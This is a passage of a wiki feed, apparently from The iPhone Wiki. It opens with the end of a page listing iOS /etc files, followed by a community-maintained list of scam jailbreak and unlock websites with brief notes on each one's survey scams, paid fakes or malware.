&lt;br /&gt;
== Children ==&lt;br /&gt;
=== Folders ===&lt;br /&gt;
* {{ipfw|alternatives}}&lt;br /&gt;
* {{ipfw|apt}}&lt;br /&gt;
* {{ipfw|asl}}&lt;br /&gt;
* {{ipfw|bluetool}}&lt;br /&gt;
* {{ipfw|default}}&lt;br /&gt;
* {{ipfw|dpkg}}&lt;br /&gt;
* {{ipfw|pam.d}}&lt;br /&gt;
* {{ipfw|ppp}}&lt;br /&gt;
* {{ipfw|profile.d}}&lt;br /&gt;
* {{ipfw|racoon}}&lt;br /&gt;
* {{ipfw|rc.d}} (not present in jailed iOS)&lt;br /&gt;
* {{ipfw|ssl}}&lt;br /&gt;
&lt;br /&gt;
=== Files ===&lt;br /&gt;
* {{ipfw|afp.conf}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|asl.conf}}&lt;br /&gt;
* {{ipfw|fstab|fstab}}&lt;br /&gt;
* {{ipfw|group}}&lt;br /&gt;
* {{ipfw|hosts}}&lt;br /&gt;
* {{ipfw|host.equiv}}&lt;br /&gt;
* {{ipfw|launchd.conf}} (see also: [[launchd.conf Untether]]; not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|master.passwd}}&lt;br /&gt;
* {{ipfw|networks}}&lt;br /&gt;
* {{ipfw|notify.conf}}&lt;br /&gt;
* {{ipfw|passwd}}&lt;br /&gt;
* {{ipfw|profile}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|protocols}}&lt;br /&gt;
* {{ipfw|services}}&lt;br /&gt;
* {{ipfw|ttys}}&lt;br /&gt;
&lt;br /&gt;
== Parents ==&lt;br /&gt;
{{parent|private}}&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* [http://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html#ETCHOSTSPECIFICSYSTEMCONFIGURATION FHS 2.3 on /etc]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Scam_Jailbreaks_and_Unlocks&amp;diff=103490</id>
		<title>Scam Jailbreaks and Unlocks</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Scam_Jailbreaks_and_Unlocks&amp;diff=103490"/>
		<updated>2020-06-26T02:59:59Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Jailbreak fakes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This is an ''incomplete'' list of community-reported '''scam sites''' that pretend to distribute or sell jailbreaking and unlocking tools/services. (There are many other scam sites not listed here yet.)&lt;br /&gt;
&lt;br /&gt;
If you see a site selling jailbreaking or unlocking software (or asking you to do a survey before downloading), it's a scam. (Companies make money when you fill out surveys, so they promise a jailbreak to get you to fill them out.) Scam sites may also provide free fake tools that actually install adware or other kinds of malware in order to make money from you. Some legitimate forms of unlocking are not free - third-party IMEI unlocks and SIM interposer devices both cost money - but ultrasn0w is always free.&lt;br /&gt;
&lt;br /&gt;
In general, please consider: '''is what the site promises too good to be true?''' Does it promise a new jailbreak for the latest iOS version, when nobody from trusted sources (such as well-known blogs or Reddit or developers on Twitter) is talking about this new jailbreak? When a real new jailbreak gets released, huge numbers of people talk about it - so if you find something people aren't talking about, be very skeptical and check trusted sources.&lt;br /&gt;
&lt;br /&gt;
=== You can contribute to this list ===&lt;br /&gt;
&lt;br /&gt;
Please contribute to this list if you find a scam site. By listing them here, we can help people find good information when they search Google for more information about these sites. If your site is listed here and you believe that's a mistake, you may contact an administrator to request removal.&lt;br /&gt;
&lt;br /&gt;
Be sure not to link to these pages, as all links will boost their Google ranking.&amp;lt;!-- Not if they have `rel=&amp;quot;nofollow&amp;quot;`? --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Jailbreak fakes ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Domain !! Notes &lt;br /&gt;
|-&lt;br /&gt;
| 3kjailbreak.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| 4na.weebly.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| 7evasi0n.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| 7jailbreak.com || On-device survey scam&lt;br /&gt;
|-&lt;br /&gt;
| 71jailbreak.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| 8jailbreak.net || Fake&lt;br /&gt;
|-&lt;br /&gt;
| alphajailbreak.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| alpinejb.blogspot.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| apps.appshed.com/[various #] || On-device fake, webclips and profiles&lt;br /&gt;
|-&lt;br /&gt;
| celtikios7.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| checkrain.com || (Not checkra1n.com, which is legit) Fake, AppStore rank booster.&lt;br /&gt;
|-&lt;br /&gt;
| checkrain.org || Fake&lt;br /&gt;
|-&lt;br /&gt;
| checkra1n-windows.com || Fake, asks for money&lt;br /&gt;
|-&lt;br /&gt;
| cyberelevat0r.net || Fake&lt;br /&gt;
|-&lt;br /&gt;
| cyberelevat0r.us || Fake&lt;br /&gt;
|-&lt;br /&gt;
| cydia8jailbreak.com || Fake has you download multiple free-to-play apps hoping for in-app purchases&lt;br /&gt;
|-&lt;br /&gt;
| cydiaappdownloader.wordpress.com || Fake. Virustotal.com analysis: 39 of 56 scanners detect malware.&lt;br /&gt;
|-&lt;br /&gt;
| cydiacloud.com || Scam. On-device webclip fakes jailbreak and prompts users to complete surveys.&lt;br /&gt;
|-&lt;br /&gt;
| cydia-download.us || Scam. On-device webclip fakes jailbreak and prompts users to complete surveys.&lt;br /&gt;
|-&lt;br /&gt;
| cydiadownloaders.com || On-device webclip scam offering $14.99 &amp;amp; $19.99 memberships&lt;br /&gt;
|-&lt;br /&gt;
| cydiafree.com || Scam. On-device webclip fakes jailbreak and prompts users to complete surveys.&lt;br /&gt;
|-&lt;br /&gt;
| cydiainstall9.weebly.com || Fake, makes you download apps from the AppStore, promo video has obvious edit.&lt;br /&gt;
|- &lt;br /&gt;
| cydiajailbreak.org || Scam. Offers links to taig-download.com offering $14.99 &amp;amp; $19.99 memberships&lt;br /&gt;
|-&lt;br /&gt;
| cydiapro.com || Scam. On-device webclip offers membership for donations of $14.99 &amp;amp; $19.99&lt;br /&gt;
|-&lt;br /&gt;
| cyrooting.com || Affiliated with cydia-download.us which installs a profile from cyrooting.com&lt;br /&gt;
|-&lt;br /&gt;
| downgradeios7.com || Fake on-device downgrade tool&lt;br /&gt;
|-&lt;br /&gt;
| downgradeios8.com || Fake on-device downgrade tool&lt;br /&gt;
|-&lt;br /&gt;
| downgradeiphone.com || Sells a false promise (universal iOS/baseband downgrade) for $29&lt;br /&gt;
|-&lt;br /&gt;
| downloadcydiainstaller.weebly.com || Scam, part of cydiapro.com group&lt;br /&gt;
|-&lt;br /&gt;
| downloadpangu.org || Fake&lt;br /&gt;
|-&lt;br /&gt;
| ecydia.com || Sells an unspecified tool for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| en-pangu.com || Fake, affiliated with i0n1c.com and taig9.com&lt;br /&gt;
|-&lt;br /&gt;
| equsi0n.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| evad3rs.me || No survey, not selling anything, just has downloads of evasi0n 1.0.7, calling it 1.0.8 and saying it works on iOS 7.1.x. Pointless.&lt;br /&gt;
|-&lt;br /&gt;
| evad3rsdevteam.com || Survey scam, copy of evasi0n.com&lt;br /&gt;
|-&lt;br /&gt;
| evad3rs-devteam.com || Copy of evasi0n.com&lt;br /&gt;
|-&lt;br /&gt;
| evad3rsjb.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| evad3rsteam.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| evasi0nblog.com || Repackaged evasi0n&lt;br /&gt;
|-&lt;br /&gt;
| evasi0ndevteam.com || Sells evasi0n for $15&lt;br /&gt;
|-&lt;br /&gt;
| evasi0njb.net || Copy of evasi0n.com&lt;br /&gt;
|-&lt;br /&gt;
| evasion-jailbreak.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| evasion-jailbreak7.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| evasi0n-jailbreak.net || Survey scam, copy of evasi0n.com&lt;br /&gt;
|-&lt;br /&gt;
| evasi0njailbreak.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| evasion7.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| evasion7download.info/pangu || Malware. See [https://www.virustotal.com/en/file/fb64d5934ebd946c0a4cd49bb8adb13005a57c0ffb04b77e94d40563b6e001e2/analysis/1418953850/ VirusTotal results]&lt;br /&gt;
|-&lt;br /&gt;
| evasioniosjailbreak.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| evasionjailbreak.net || Survey scam, copy of evasi0n.com&lt;br /&gt;
|-&lt;br /&gt;
| evasionjailbreak.us || Copy of evasi0n.com&lt;br /&gt;
|-&lt;br /&gt;
| evasionjailbreak7.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| evasi0n-official.com || Survey scam, loosely copied from evasi0n.com&lt;br /&gt;
|-&lt;br /&gt;
| evasl0n.blogspot.com || Survey scam, copy of evasi0n.com&lt;br /&gt;
|-&lt;br /&gt;
| evasi0n7.com/pangu || Fake&lt;br /&gt;
|-&lt;br /&gt;
| evasion7download.info || Malware. See [https://www.virustotal.com/en/file/fb64d5934ebd946c0a4cd49bb8adb13005a57c0ffb04b77e94d40563b6e001e2/analysis/1418953850/ VirusTotal results]&lt;br /&gt;
|-&lt;br /&gt;
| evasion7-jailbreak.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| evazi0n.net || Fake&lt;br /&gt;
|-&lt;br /&gt;
| ex0dus-jailbreak.com || Unspecified tool, claims to be developed by @planetbeing and @pimskeks. Survey scam after being strung along downloading a fake tool which requires a patch, said patch download requiring survey completion.&lt;br /&gt;
|-&lt;br /&gt;
| factory-directme.com || Sells redsn0w for $14.95&lt;br /&gt;
|-&lt;br /&gt;
| firest0rm.net || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| freed0md00r.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| future7ios7.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| geeksn0w.net || Copy of geeksn0w.it&lt;br /&gt;
|-&lt;br /&gt;
| geeksn0w.net/pangu || Fake&lt;br /&gt;
|-&lt;br /&gt;
| geeksn0wdownload.com || Copy of Geeksn0w.it&lt;br /&gt;
|-&lt;br /&gt;
| getelectra.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| getthebest365.com || Sells unspecified tool for $27.00&lt;br /&gt;
|-&lt;br /&gt;
| getcydiapro.com || Requires downloading apps&lt;br /&gt;
|-&lt;br /&gt;
| greenpois0n-gc.blogspot.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| hexxaplus.com || Fake, claims 13.4 support, installs profile from pangu8.com&lt;br /&gt;
|-&lt;br /&gt;
| icysn0w.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| idevicehacker07.com || Fake, claims to install R4m0n JB for iOS 9&lt;br /&gt;
|-&lt;br /&gt;
| idowngrade.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| iemu.org || Fake; previous site for [[iEmu]]&lt;br /&gt;
|-&lt;br /&gt;
| ievad3rs.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| ijailbreak-iphone.com || Sells an unspecified tool for $19.95&lt;br /&gt;
|-&lt;br /&gt;
| ijailbreaking.com || Fake, see iosjailbreakings.com entry&lt;br /&gt;
|-&lt;br /&gt;
| ijailbreakpro.com || Sells an unspecified tool for $29.90, $39.90 and $49.90&lt;br /&gt;
|-&lt;br /&gt;
| ijailbreakpro.net || Sells an unspecified tool (for $29.90, $39.90, and $49.90), to which the most expensive purchase is required to use the tool more than once.&lt;br /&gt;
|-&lt;br /&gt;
| ijailbreaktool.com || Sells an unspecified tool for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| imessagewin.com || Claims to have iMessage for Windows platform; Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| ineedjailbreak.com || Sells evasi0n / redsn0w for $24.95&lt;br /&gt;
|-&lt;br /&gt;
| inj3ct3d.klikkit.co.uk || asking for donations to publish a non-existent jailbreak&lt;br /&gt;
|-&lt;br /&gt;
| insanelyios.blogspot.com || Downgrade fake, survey scam&lt;br /&gt;
|-&lt;br /&gt;
| instajailbreaker.com || Sells unspecified tool(s) for $29.95&lt;br /&gt;
|-&lt;br /&gt;
| installcydia.mobi || Fake. Takes you to appial.com for freemium appstore games&lt;br /&gt;
|-&lt;br /&gt;
| instantjb.com || Fake. Installs multiple profiles. Sells &amp;quot;premium&amp;quot; cydia for $9.99&lt;br /&gt;
|- &lt;br /&gt;
| ios-6-1-4-jailbreak.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| ios-jailbreak.com || Provides fake iOS 9.3 jailbreak tool that includes malware&lt;br /&gt;
|-&lt;br /&gt;
| ios8jailbreak.org || Fake&lt;br /&gt;
|-&lt;br /&gt;
| ios8jailbreak.tk || Fake (alternate domain name is ios8-jailbreak.weebly.com)&lt;br /&gt;
|-&lt;br /&gt;
| ios8jailbreakdownload.net || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| ios8pangu.com || Fake, webclip. Wants to install unsigned profile that cannot be removed&lt;br /&gt;
|-&lt;br /&gt;
| ios9.semijb.com || See semijb.com entry&lt;br /&gt;
|-&lt;br /&gt;
| ios11.site || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| iosjail.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| iosjailbreak.org || Scam. Links to webclip sites with $14.99 &amp;amp; $19.99 memberships for fake cydia&lt;br /&gt;
|-&lt;br /&gt;
| iosjailbreak.top || Requires downloading apps&lt;br /&gt;
|-&lt;br /&gt;
| iosjailbreakings.com || Fake, sends you to ijailbreaking.com&lt;br /&gt;
|-&lt;br /&gt;
| iosjailbreakpangu.com || Survey scam. Good copy of real pangu site&lt;br /&gt;
|-&lt;br /&gt;
| ipadjailbreak3.com || Forwards to jailbreakunlock.org&lt;br /&gt;
|-&lt;br /&gt;
| ipangu.net || Fake. Passworded zip files&lt;br /&gt;
|-&lt;br /&gt;
| iphone5break.com || Sells unspecified tool for $49.99&lt;br /&gt;
|-&lt;br /&gt;
| iphonejailbreakplus.com || Sells evasi0n / redsn0w for $29.95&lt;br /&gt;
|-&lt;br /&gt;
| iphonejailbreak-unlock.com || Sells unspecified tool for $27.00&lt;br /&gt;
|-&lt;br /&gt;
| iremotejb.com || Fake. AppStore app download scheme to boost app rankings and profit scammer via in-app advertising.&lt;br /&gt;
|-&lt;br /&gt;
| irevert.wordpress.com/ || Claims to be able to downgrade firmware&lt;br /&gt;
|-&lt;br /&gt;
| i0n1c.com/jailbreak-ios-9.1 || Fake browser-based tool&lt;br /&gt;
|-&lt;br /&gt;
| jail-ios.com || App Store app download scam, also a survey scam. They should sell it outright for the trifecta.&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak.cc || Sells jailbreaking tools&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak.live || Fake&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak-7.com || App Store app download+play time required, artificially inflating its popularity&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak-absinthe.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak-ios-7.com || Tells people to go to thejailbreakshop.com&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak-ios7.net || Sells unspecified tools for $29.95 and $39.95&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak-my-ipad.org || Sells evasi0n / redsn0w for $29.95 '''per month'''&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak-my-iphone.com || Sells unspecified tool for $29.97&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak-official.com || Sells &amp;quot;jailbreak membership&amp;quot; for $19.99&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak-team.com || Sells an unspecified tool for $29.99&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak71.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| jailbreak7wizz.com || Links to jailbreakthings.com, which in turn links to instajailbreaker.com, which sells unspecified tools for $29.95&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakandunlock1.pressdoc.com || Blog that is about jailbreak and unlock which uses fake tools.&lt;br /&gt;
|- &lt;br /&gt;
| jailbreakbj.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakgenie.com || Scam. Sells unspecified jailbreak tool for $9.99&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakios7untethered.com || Survey scam, all set up in advance for iOS 7&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakiosnewversion.elitegamershub.com || Survey scam, copied/modified verion of evasi0n7&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakiphone5s.com || Tells people to go to thejailbreakshop.com&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakme10.com || ICU's attempt to cash in on Yalu&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakmenow.net || Sells unspecified tools for $19.95, $29.95, and $39.95 &lt;br /&gt;
|-&lt;br /&gt;
| jailbreaknewiphone.com || Survey scam after being strung along downloading a fake tool&lt;br /&gt;
|-&lt;br /&gt;
| jailbreaktheipad2.com || Sells unspecified tool for $14.95&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakthings.com || Exists solely to promote instajailbreaker.com, a scam site&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakunlock.info || Sells unspecified tools for $19.95, $29.95, and $39.95&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakunlock.org || Sells evasi0n / redsn0w for $14.95&lt;br /&gt;
|-&lt;br /&gt;
| jailbroke.info || Sells jailbreaking &amp;quot;solutions&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| jbadd.com || Requires downloading apps&lt;br /&gt;
|-&lt;br /&gt;
| k33n.mobi || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| k33nweb.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| latestiphoneunlock.com || Sells an unspecified tool for $9.95 or $29.95&lt;br /&gt;
|-&lt;br /&gt;
| linxijb.weebly.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| newios7jailbreak.com || Directs visitors to unlock-jailbreak.net&lt;br /&gt;
|-&lt;br /&gt;
| oneclickjailbreak.com || Sells an unspecified tool for at least $29.95&lt;br /&gt;
|-&lt;br /&gt;
| opensn0w.net || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| overcast7.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| pangu8.com || Fake. Installs webclip from semijb.com&lt;br /&gt;
|-&lt;br /&gt;
| pangu8.us || Scam. Part of the cydiapro.com group of on-device webclip scams with $14.99 &amp;amp; $19.99 &amp;quot;memberships&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| pangu9.net  || Scam. Charges paid &amp;quot;memberships&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| pangu9.mobi || Fake&lt;br /&gt;
|-&lt;br /&gt;
| pangu10.mobi || Claims to have &amp;quot;injected&amp;quot; cydia into App Store apps, makes money off of you installing the apps.&lt;br /&gt;
|-&lt;br /&gt;
| pangu11.mobi || Fake, see pangu10.mobi&lt;br /&gt;
|-&lt;br /&gt;
| pangucydia.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| pangudownload.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| pangu-download.net || Fake&lt;br /&gt;
|-&lt;br /&gt;
| pangu-jailbreak.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| pangujailbreak.info || Fake, survey scam, poor things can't even pay their hosting bill :)&lt;br /&gt;
|-&lt;br /&gt;
| pangujb.blogspot.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| pangujb11.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| pangulive.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| pangunow.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| pod2gblog.blogspot.com || Copy of pod2g's blog&lt;br /&gt;
|-&lt;br /&gt;
| p0sixspwn.co || Windows version is a malware downloader that eventually downloads the real [[p0sixspwn]]&lt;br /&gt;
|-&lt;br /&gt;
| posixspwndownload.com || Copy of [[p0sixspwn]]&lt;br /&gt;
|-&lt;br /&gt;
| ppjailbreak.com || Copy of [[PPJailbreak]] and copyright infringement&lt;br /&gt;
|-&lt;br /&gt;
| ppjailbreakdownload.com || Fake. Has links to real tools.&lt;br /&gt;
|-&lt;br /&gt;
| premiumjailbreak.com || Sells jailbreaking tools&lt;br /&gt;
|-&lt;br /&gt;
| purpletools.wordpress.com || (and all the other sites/people offering similar stuff)&amp;lt;br /&amp;gt;Scam - Claims access to Apple's internal VPN&lt;br /&gt;
|-&lt;br /&gt;
| redpois0n.net || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| red-snow.com || Sells unspecified tools for $29.95 and $39.95&lt;br /&gt;
|-&lt;br /&gt;
| redsn0w-r9-new.blogspot.com || Survey scam, text is ripped from Dev-Team Blog&lt;br /&gt;
|-&lt;br /&gt;
| ricojb.com || Requires downloading apps&lt;br /&gt;
|-&lt;br /&gt;
| rocky-racoon.com || Survey scam, copy of Dev-Team Blog&lt;br /&gt;
|-&lt;br /&gt;
| safera1n.com || Sells an unspecified tool for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| saigonjb.com || Fake. AppStore app download scheme&lt;br /&gt;
|-&lt;br /&gt;
| silv3rwind.com || Sells an unspecified tool for $20&lt;br /&gt;
|-&lt;br /&gt;
| semijb.com || Fake. Does not install &amp;quot;the cydia.&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| semirestore.org || Fake redistributions of SemiRestore and SemiRestore7&lt;br /&gt;
|-&lt;br /&gt;
| spirit-jb.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| spiritjb.net || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| synergyjailbreak.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| taig-download.com || Scam. On-device webclip offers membership for $14.99 &amp;amp; $19.99&lt;br /&gt;
|-&lt;br /&gt;
| taig-nc.blogspot.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| taig8.net || Fake&lt;br /&gt;
|-&lt;br /&gt;
| taig9.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| taig9.mobi || Fake. AppStore app download scheme to boost app rankings and profit scammer via in-app advertising.&lt;br /&gt;
|-&lt;br /&gt;
| taig10.mobi || Fake. AppStore app download scheme.&lt;br /&gt;
|-&lt;br /&gt;
| taigremote.com || On-device app-download scam, basically a survey scam&lt;br /&gt;
|-&lt;br /&gt;
| team7jailbreak.com || On-device survey scam (redirects to 7jailbreak.com). [https://twitter.com/search?q=It%27s%20easy.%20%20Follow%20this%20realy%20simple%20guide%20from%20%40teamjailbreak7&amp;amp;src=typd&amp;amp;f=realtime Known to spam on Twitter]&lt;br /&gt;
|-&lt;br /&gt;
| theios7jailbreaker.com || Directs people to scam sites (ijailbreakpro.com, appleunlocker.com, ijailbreaktool.com)&lt;br /&gt;
|-&lt;br /&gt;
| theios8jailbreak.com || Fake&lt;br /&gt;
|-&lt;br /&gt;
| thejailbreakshop.com || Sells an unspecified tool for $29.97 and $49.97&lt;br /&gt;
|-&lt;br /&gt;
| topangajb.com || Fake. AppStore app download (rank boosting) scheme.&lt;br /&gt;
|-&lt;br /&gt;
| trianglejailbreak.com || Sells jailbreaking tool&lt;br /&gt;
|-&lt;br /&gt;
| u7xjailbreak.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| unc0ver.com || webclip, wants to install unsiged, un-removable profile&lt;br /&gt;
|-&lt;br /&gt;
| unc0ver.org|| copy of unc0ver.dev. Probably fake. Wants to install a profile.&lt;br /&gt;
|-&lt;br /&gt;
| unc0ver.vip || Copy of unc0ver.dev. Claims 13.3.1 support, wants to install unsigned profile and asks you to complete a survey.&lt;br /&gt;
|- &lt;br /&gt;
| unja1l.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| unjailme.com || AppStore rank boosting scheme&lt;br /&gt;
|-&lt;br /&gt;
| untetheredjailbreakios8.com || Survey scam&lt;br /&gt;
|- &lt;br /&gt;
| zjailbreak.com  || Claims iOS 11 - iOS 13.4.5 jailBreak, wants to install signed profile, claims to be freemium, ask for money donations.&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Scam jailbreak and unlock sites ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Domain !! Notes &lt;br /&gt;
|-&lt;br /&gt;
| appleunlocker.com || Sells unspecified jailbreaking + unlocking software for $19.95&lt;br /&gt;
|-&lt;br /&gt;
| bestra1n.com || Sells unspecified jailbreaking + unlocking software for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| cheapestiphoneunlock.com || Sells unspecified jailbreaking + unlocking software for $9.99&lt;br /&gt;
|-&lt;br /&gt;
| deblocage-iphone-fr.com || Sells unspecified unlocking software for €29.99&lt;br /&gt;
|-&lt;br /&gt;
| desbloquear-iphone-pro.com || Sells unspecified unlocking software for €29.99&lt;br /&gt;
|-&lt;br /&gt;
| e-imeiunlock.com || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| easyiphoneunlocking.com || Sells unspecified jailbreaking + unlocking software for $24.95&lt;br /&gt;
|-&lt;br /&gt;
| easyunlockiphone.net || Sells unspecified jailbreaking + unlocking software for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| easyunlockingsolutions.com || Sells unspecified unlocking software for $19.99&lt;br /&gt;
|-&lt;br /&gt;
| how-jailbreak-iphone.com || Sells unspecified jailbreaking + unlocking software for $19.95&lt;br /&gt;
|-&lt;br /&gt;
| ih8sn0w.mobi || Sells who knows what for 20 Euros. Quite funny, but don't be a sucker.&lt;br /&gt;
|-&lt;br /&gt;
| ijailbreakpro.com || Sells redsn0w for $29.90, $39.90, or $49.90&lt;br /&gt;
|-&lt;br /&gt;
| ijailbreaktool.com || Sells unspecified jailbreaking software for $24.99&lt;br /&gt;
|-&lt;br /&gt;
| ios7jailbreaker.net || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| ios7jailbreak.fr || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| iphone-unlocker.org || Survey scam&lt;br /&gt;
|-&lt;br /&gt;
| iphone-instant-unlock.com || Sells unspecified unlocking software for $14.95&lt;br /&gt;
|-&lt;br /&gt;
| iphone-unlock-pro.com || Redirects to unlock4iphone.com, desbloquear-iphone-pro.com, and deblocage-iphone-fr.com&lt;br /&gt;
|-&lt;br /&gt;
| iphone-unlocker-pro.com || Sells unspecified jailbreaking + unlocking software for $24.95&lt;br /&gt;
|-&lt;br /&gt;
| iphone-unlock-me.com || Sells unspecified unlocking software for $14.95&lt;br /&gt;
|-&lt;br /&gt;
| iphone-unlockme.com || Sells unspecified unlocking software for $14.95&lt;br /&gt;
|-&lt;br /&gt;
| iphone5break.com || Sells unspecified jailbreaking + unlocking software for $49.99&lt;br /&gt;
|-&lt;br /&gt;
| iphoneimei.net || Fake&lt;br /&gt;
|-&lt;br /&gt;
| iphoneunlocker.org.uk || Sells unspecified jailbreaking + unlocking software for £14.99&lt;br /&gt;
|-&lt;br /&gt;
| iphoneunlockersoftware.com || Sells unspecified jailbreaking + unlocking software for $24.97&lt;br /&gt;
|-&lt;br /&gt;
| iphoneunlockplus.com || Sells unspecified unlocking software for $22.99&lt;br /&gt;
|-&lt;br /&gt;
| iphoneunlockwiz.com || Sells unspecified jailbreaking + unlocking software for $29.97&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakandunlockiphones.com || Glowing reviews of, and links to, scam sites which are mostly offline now&lt;br /&gt;
|-&lt;br /&gt;
| jailbreakiphone5express.com || Links to ijailbreakpro.com, appleunlocker.com and ijailbreaktool.com&lt;br /&gt;
|-&lt;br /&gt;
| myappledownload.com || Sells undefined non-existing jailbreaks, unlocks, downgrades for $19.99&lt;br /&gt;
|-&lt;br /&gt;
| mydowngrade.com || Sells undefined non-existing jailbreaks, unlocks, downgrades for $19.99&lt;br /&gt;
|-&lt;br /&gt;
| myunlocker.org || On-device survey / app download scam&lt;br /&gt;
|-&lt;br /&gt;
| officialiphoneunlock.co.uk || Fake&lt;br /&gt;
|-&lt;br /&gt;
| phoneunlockguy.com || Sells unspecified jailbreaking + unlocking software for $14.95&lt;br /&gt;
|-&lt;br /&gt;
| solutions-directme.com || Sells unspecified jailbreaking software for $14.95&lt;br /&gt;
|-&lt;br /&gt;
| superiorsim.com || Sells SIM interposers, reported to be a scam by various websites&lt;br /&gt;
|-&lt;br /&gt;
| superunlockiphone.com || Sells unspecified jailbreaking + unlocking software for £14.99&lt;br /&gt;
|-&lt;br /&gt;
| tracyandmatt.co.uk || Refers victims to unlock-jailbreak.net&lt;br /&gt;
|-&lt;br /&gt;
| transx-solutions.com || Sells software for $14.95 which does not say what it is. Also requires a download&lt;br /&gt;
|-&lt;br /&gt;
| trusted-iphone-unlocker.com || Sells unspecified jailbreaking + unlocking software for $24.95&lt;br /&gt;
|-&lt;br /&gt;
| ultimateiphoneunlocker.com || Sells unspecified unlocking software for $19.95&lt;br /&gt;
|-&lt;br /&gt;
| unlock-your-phones.com || Sells evasi0n as an unlock for €8.99&lt;br /&gt;
|-&lt;br /&gt;
